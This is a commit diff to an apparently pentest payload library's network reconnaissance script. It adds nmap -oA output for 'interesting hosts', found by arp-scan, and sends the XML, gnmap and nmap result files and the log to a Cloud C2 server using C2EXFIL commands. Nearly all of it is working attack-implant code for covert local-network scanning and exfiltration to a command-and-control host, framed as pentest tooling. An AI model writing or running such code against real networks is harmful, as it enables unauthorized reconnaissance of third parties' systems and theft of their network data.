Adding nmaps -oA option to interessting hosts scan (#48)

Adding the -oA option of nmap to export results in useful formats and upload them to the C2 Cloud. For further use in a pentest.
2021-12-14 01:19:37 +01:00 · 2021-12-14 01:19:37 +01:00 · b4340761ba
parent 5e6bbc86d3
commit b4340761ba
1 changed files with 61 additions and 32 deletions
--- a/payloads/library/recon/Network-Recon-framework-payload-with-logging-notification-and-exfiltration/payload.sh
+++ b/payloads/library/recon/Network-Recon-framework-payload-with-logging-notification-and-exfiltration/payload.sh
@ -423,6 +423,8 @@ function GRAB_NMAP_LOOT() {
 function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
        if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
                NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
+                ### Adding -oA nmap option to scan option
+                NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-${SCAN_COUNT}-${TODAY}"
                touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
                INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
                INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
@ -479,10 +481,37 @@ function EXFIL_TO_CLOUD_C2() {
                                LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
                                C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
                        done
+                        ### Add exfiltration of nmap -oA files
+                        ## XML
+                        LOOT_FILES="$LOOT_DIR/*.xml"
+                        LOOT_FILE="${LOOT_FILES}" #just one file so no loop
+                        LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
+                        LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
+                        LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
+                        C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
+
+                        ## GNMAP
+                        LOOT_FILES="$LOOT_DIR/*.gnmap"
+                        LOOT_FILE="${LOOT_FILES}" #just one file so no loop
+                        LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
+                        LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
+                        LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
+                        C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
+
+                        ## NMAP
+                        LOOT_FILES="$LOOT_DIR/*.nmap"
+                        LOOT_FILE="${LOOT_FILES}" #just one file so no loop
+                        LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
+                        LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
+                        LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
+                        C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
+
+                        ### Exfiltrate log file
                        LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
                        C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
                else
                        echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
+
                fi
        fi
        return